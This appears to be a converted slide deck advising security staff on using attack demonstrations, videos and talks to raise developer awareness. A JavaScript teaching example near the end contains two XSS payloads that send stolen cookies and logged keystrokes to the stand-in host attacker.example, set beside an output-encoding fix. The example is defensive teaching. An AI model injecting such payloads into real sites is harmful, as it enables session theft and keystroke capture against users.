CREATING DEVELOPER SECURITY AWARENESS: USING ATTACKS
David Klassen
Would you like your software development staff to think longer and harder about the software they create? Create some awareness material for them that demonstrates how software can be attacked.

TL;DR
INTRODUCTION
• Evolving methods of communicating security problems to developers:
  • OWASP AppSec Tutorial Series: shock value, easily demonstrates risk/prevention
  • I have noticed that web developers really take to powerful, short introductions
  • Michael Howard @ OWASP AppSecUSA in 2012:
    • won't work if it's too long or overloads the listeners (retention?)
    • best done in short presentations that can quickly explain (i.e. zest/punch)
    • have a whole website (book?) available for people looking for more clarification
• It is hard to find good information that couples vulns with attacks and fixes
• You can tell them to fix, but if you don't W5 the issues (who, what, when, where, why), things get dropped
• Somehow security groups need to model for others what is at risk in an attack
• Remind them why we want to prevent attacks, and cite reputation issues
ENCHILADA
FOG OF SECURITY RE-ENGINEERING
• Some bugs get fixed… but the pen-testers continually report issues that are not fixed and probably won't get fixed.
• The flaw is buried in the most popular feature
• You've performed or reviewed the millionth assessment with bug X
• You've had that 24th meeting…
• Burnout is here and even you need relief
• It's time to take an issue to Awareness and somehow blow them out of the water!
• Pick your darkest bug set and detail what exploitation might look like…
PILE IT HIGH
• After working in software security you might start thinking like a philosopher:
  • While an XSS might divulge a user's session cookie, and even that is a really critical issue to fix, certain individuals might rightly state: well, a login to such-and-such a feature has no access to anything important.
  • So you see, what this XSS provides to an attacker doesn't really mean anything, because that webapp has no access to critical information assets???
• What such a response glosses over is that exposing a user's session cookie is only one of a plethora of possible attack vectors (up to and including RCE)
• Everyone knows that SecBug X is bad-ass; however, "they don't know how…"
• Actually you don't really know either; let's start to build some kind of integrity here
• By debunking the arguments and rebuttals provided, we bring people closer
RAISE THE BOO-YAH
• Use attacks that have been used in reality and discussed in the news.
• See if you can't pair common bug X with a real attack payload, so they can later look it up and learn about it.
• Don't allow yourself to make a boring communication. Make it with pizazz!
• Get yourself excited about the problems by taking the training.
• There are lots of security training groups out there (get up to date).
• Don't cheap out by telling yourself "I can learn this on my own" (time == $$$).
FILTER THE BS
• YouTube is great and I have seen great videos there, but it's usually nothing you can show your company
• There is a certain way of being a cool cat that really isn't that cool. In a year or two it's not cool
• If you want the audience for your video to actually be people who develop software, you are going to need to adapt to meet their needs
• If we don't take developers all the way to s-hell, then we're not really taking them anywhere
• Is making it simple not your job? Then stay solo
• Look at the experts in communication: do they skirt around the issues, or aim for the heart?
GET OVER THE AWARENESS BUSINESS
• The executives talked about raising awareness
• However, when it came to meeting the expectations of your common developer…
• When I started making presentations and videos to summarize, everything just felt better.
• After creating this video I noticed the executives subscribed to an official set of security awareness material
• As I looked at what was out there, though, I realized I am a party of one, and really the only one with an incentive to learn more.
• There are many hats you can wear in this business, but which one will have an effect?
KEEP IT ORGANIC
• If you create a company-directed security promotional like this, you can post links to it everywhere:
  • Wiki
  • Bug pages
  • e-mails
  • chat
  • etc.
• There are more chances for people to run across it in their everyday work
• By piquing people's interest, we are exposing the worst of the issues and trying to steer people towards real risks.
• Helping the company to build integrity.
GET THE FACTS
• I spent time, effort, and money to chase down exploitation beyond session cookies, because it seemed interesting to me and I didn't remember seeing this anywhere:
  • Research the topic
  • Listen to podcasts/conference talks
  • Speak to others (hardest)
  • Take the training
  • Can we find it in our own code anywhere? (Do it.)
  • If we consider it APT-possible, what things can happen?
• By attempting to understand what is attackable, we have a better awareness of what is probable
• We will also learn about the protection others believe is there
DREAM BIG
• Focus on your attacks first. Your story.
• Everyone has heard about hacking
• We mix in legalities and $kirt the field
• I wanted to work in software development
• I didn't want to be in QA anymore
• I ended up finding quite a few vulns
• I knew the vulns were bad, but not how
• As a paid employee, legally this info is?
• Enlighten on these scary predicaments
PERFECTING YOUR ATTACKS
• To be honest, I hate the spy concept
• But considering our industry, it works
• Ensure you exhaust all your resources
• When you find that last morsel: Boom!
• An Aurora video I found online did it
• If I hadn't searched long enough?
• After it starts rolling for you, perfect it
• A legitimate attack scenario is not easy
• The task of explaining to others is hard
PERFECTING THE EXPLANATION
• No exploitation, no explanation
• Tell the whole story and the real risks
• Yes, it is a bad subject, but it's also work
• A practiced attack gives you domain info
• Record your video as if for strangers
• Use all the VMs/tools, and cut it out later
• Explanations demand more video/story
• After you have perfected the attack and explanation video, create a script
• Working back from this you will find introduction tie-ins and more.
DO THE POST-MORTEM
• Mastered attack -> easier explanations
• Tie it back to reality, in the simple or the hard
• Show the proof of what happened
• Relate to other attacks: clickjacking (CJ) of the FB login
• In some way all attacks are the same
• A good place for lead-ins to other vulns
• Emphasize the attack line if important
• Doing this well leads to a good intro
• I wanted to jump into the fix, but it didn't make sense quite yet to do that
• Make it as detailed as necessary
A STORY BUILDS IT UP
• A video that displays real compromise should be easy to create a story for
• It also might mix with real life (A/V)
• If you get better ideas, just go for it
• Redos are common with a new script
• Video editing software is so buggy!
• New ideas will come; weigh the value
• It is best to at least cover these:
  1. Something everyone has heard/seen
  2. A full exploit that hits fast and deep
  3. A fast automated attack
• People should start to think differently
WHY DO WE CARE?
• They are not going to get it… So!
• Make a laughing stock of yourself
• Phishing intro: the first thing in my mind
• Later it felt sarcastic, and a good vice
• It made the problem more plain to see
• I was hoping someone would laugh, and then run smack into realization
• That's just it! A real XSS exploit appears to be just like any other web page
• It is important to realize that a website can be made to do anything, and developers are in charge of appearance
HOW DID WE FIND THE BUG?
• Are we ever asked to fix the bugs?
• Do devs become security conscious because they know how to program?
• Show devs how to consider STDD
• This might lead to something else, like the discovery of problematic third-party code
• Let them know about SAST/DAST
• Detection knowledge leads to prevention
• Attempt to include your product or company in the video
• Bring up reputation and liability issues
REMEDIATE
• Go beyond insults to engineering
• No one is perfect. We need a common ground for discussion; make one.
• Some bugs might be simple to fix
• RCE bugs are anything but simple, because the fault is in the genetics
• When dealing with RCEs, go deep
• Try to use the best sources/definitions
• Provide them framework suggestions
• Map the entire issue lifecycle + fix
• RCE preventions and counter-measures
SOCIAL
EXPLAIN THE EQUIPMENT
• Are we fighting this battle bare-handed?
• Explaining prevention can be simple…
• For RCE it is hard, so go as far as required
• OWASP XSS Prevention was thorough, but I had to bow out and exit stage left (time)
• Don't go so deep that no one is listening
• If they don't watch it, they can't mock
• Make it fun, but try not to waste time
• Aim to gain the respect of your groups
• Use a dev-possible mindset for awareness
• Create a wiki page detailing the equipment
JU$TIFICATION
• Who? Me? If not you, who else can/will?
• There is lots of philosophy in business, but try not to get caught up in the rat race
• Be prepared to justify your videos/cause
• Make your video respect-worthy
• Put your own time into it, or just go home
• Having security training is good, but an in-person explanation can be specific
• Be prepared to poke holes in the other strategies presented by management
• There is no fail in attempting to help…
• If you think you're failing, speak to others!
IDENTIFYING WITH MANAGEMENT
• Accountability is another word for this
• Luckily you are not alone. People have been selling security to other people since before we had democracies…
• Look up some of these people. Metricon
• Many reports out there to reference/facts
• Statistics not there? Use news headlines
• Make friends with the management team.
• If you're an employee, don't shame us…
• The reason you start with report citations is to make it a business issue, not personal
THE GOLDEN BLUEBERRY
• Here is my magic word slide (Secret Sauce)
• Rethink the video so you sell it to the group
• Not management heavy? You're lucky!
• A report will help to bring it to the business
• Introduce the issue the typical way (atypical?)
• Start where they are at, but carve the path
• I used vulnerability finding to put it in scope, something that dev might have seen before
• Every "seminar" has a magic sales slide
• You can do it, feel the magic, believe it
• Don't forget everyone is special… in that they have a chance in this life (in some way)
GIVE IT A GOOD HOME
• Ask others where the best place to showcase it is. Find the usual locations.
• Some place that has high visibility, where people look all the time
• I recommend an internal location
• Don't post it on YouTube; if it is any good it will contain privileged info
• If awareness doesn't make people question things, what is it doing?
• If your company is small or lean enough, perhaps other methods will work better. Are they listening?
• Perhaps a general video that describes key industry issues.
COMMUNICATE IT
• If you have created something new
• If you are really interested in it
• Make it a big deal
• Invite the dev teams you work with, and anyone else interested
• Send them an introduction e-mail with a good link to your video.
• Ask them to watch the video and consider coming out to discuss it
• Ask everyone when they want to meet
• Plan a Lunch and Learn for small groups
• If you have a large group, have an open forum and invite discussion…
IN PERSON DISCUSSIONS
• Book a good time for everyone, or plan to have multiple meetings
• Create a slide deck that covers all the issues they might need to know.
• We can answer questions, but if no one has any questions, have it ALL
• From recent issues to academic
• Ask the audience questions (reflect)
• Attack – history, variations, and risk
• Exploitation – how far does it go?
• Detection – perform tests to check
• Prevention – library features etc.
• Monitoring – is it in the logs? OODA
• Protection – policies/controls available
TALKING SHOP
• These slides can be a bit boring, but the topic isn't boring; try to keep it exciting
• The talk is going to reflect your wiki and aim to completely cover the issue
• Engage with the audience
• Make sure they understand the depth of the problems. Ask for their opinion
• What did XSS allow us to do to the victim?
  • Steal their cookie jar?
  • Or insert a key logger?
• We want to highlight their knowledge
• If no one is answering questions, ask them why; learn to communicate
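The question this slide puts to the room ("steal their cookie jar, or insert a key logger?") and the point made under PILE IT HIGH, that a session cookie is only one of the vectors an XSS opens, are easiest to see side by side in code. The block below is an added example written for this page; it is not code from the deck or its author. It shows a reflected search page in its vulnerable and output-encoded forms, two constructed payloads, and a check of what the HttpOnly cookie flag does and does not stop once attacker script runs in the victim's page. The attacker origin, the Set-Cookie header values, and the function names are assumptions made for the demo.

```javascript
// Added example (not from the slide deck): reflected XSS sink, its hardened
// form, and the two attacker outcomes the slide asks about.
// ATTACKER_ORIGIN is a hypothetical collection endpoint for this demo.
const ATTACKER_ORIGIN = "https://attacker.example";

// Output-encode for an HTML body context: the five characters that can change
// parsing there (the HTML-context rule from the OWASP XSS Prevention Cheat Sheet).
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable: the search term is reflected straight into the page body, so the
// browser renders attacker markup exactly like any other page content.
function renderSearchUnsafe(query) {
  return `<h1>Results for ${query}</h1>`;
}

// Hardened: same page, but the untrusted value is encoded for the context it lands in.
function renderSearchSafe(query) {
  return `<h1>Results for ${escapeHtml(query)}</h1>`;
}

// Two payloads an attacker might reflect (constructed for this example).
// 1) Cookie theft: reads document.cookie, which HttpOnly hides from script.
const STEAL_COOKIES =
  `<script>new Image().src="${ATTACKER_ORIGIN}/c?"+encodeURIComponent(document.cookie)</script>`;
// 2) Key logger: never touches document.cookie, so cookie flags do nothing
//    against it; the attacker's script only has to run in the victim's page.
const KEYLOGGER =
  `<script>document.addEventListener("keydown",e=>fetch("${ATTACKER_ORIGIN}/k?"+encodeURIComponent(e.key)))</script>`;

// Would a browser find an executable <script> element in this rendered page?
function containsScript(html) {
  return /<script\b/i.test(html);
}

// Parse the attribute flags of a Set-Cookie header value (constructed input).
function cookieFlags(setCookie) {
  const attrs = setCookie.split(";").slice(1).map((a) => a.trim().toLowerCase());
  return { httpOnly: attrs.includes("httponly"), secure: attrs.includes("secure") };
}

// What the attacker still gets once a payload executes in the page, given the
// session cookie's flags: HttpOnly blocks the first payload, not the second.
function attackerOutcome(setCookie, payload) {
  const { httpOnly } = cookieFlags(setCookie);
  if (payload.includes("document.cookie")) {
    return httpOnly ? "nothing: cookie is HttpOnly" : "session cookie";
  }
  return "keystrokes: HttpOnly is irrelevant";
}
```

Two caveats worth saying out loud in the talk: the encoder above is only correct for HTML body text, and a value landing in an attribute, a URL, or a script block needs that context's own rule; and HttpOnly is a mitigation for one payload, not a fix for the bug, since any script the attacker can run in the page can do whatever the page can do.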
RESULTS
• From my experience, not sure if they are listening
• It's like you are working with silence, not people
• The important part is that they have been told
• If they understand this… watering hole, malverts?
• We are trying to get them to think about it
• Developers who get it are really rare
• However, those who do can really help you out
• Reach horizontally and vertically in your corp.
• HR can help with spreading some messages
• Alter corporate processes and remove oversights
• The whole goal here is to help the team work well
  30. 30. HERE’S WHAT I THINK WORKS • If you think you have covered it all, have you managed to cover: • Monitor • Attack • Prevention • Protection • Exploitation / Explanation • Detection • In other words, is the issue MAPPED? • We often spew vulns not explanations • We need to gain engineering buy- in, where money is king, security has a cost • There are so many experts who say this
GET THE PEOPLE LISTENING
• AS: Learn more about why developers don't want to fix the problems, instead of debating the probability of attack
• We need to be creative about how we get Development into the discussion
• JW: We need to remember that software priorities according to developers are:
  1. Expected functions and features
  2. Performance
  3. Usability
  4. Uptime
  5. Maintainability
  6. Security
• If we can do 1-5, then probably Security
ISSUE IMMERSION
• Ideally you have researched:
  • the exploitation topics
  • the corporate vulnerability history
• Stayed aware for your company:
  • full-disclosure, bugtraq etc.
  • or out there through other sources
• Participated in:
  • penetration tests on assets
  • leading the bug triaging process
  • assessments/reviews on your group
• Good sources for a starting point
SEE THE SLIDE NOTES FOR MORE !!!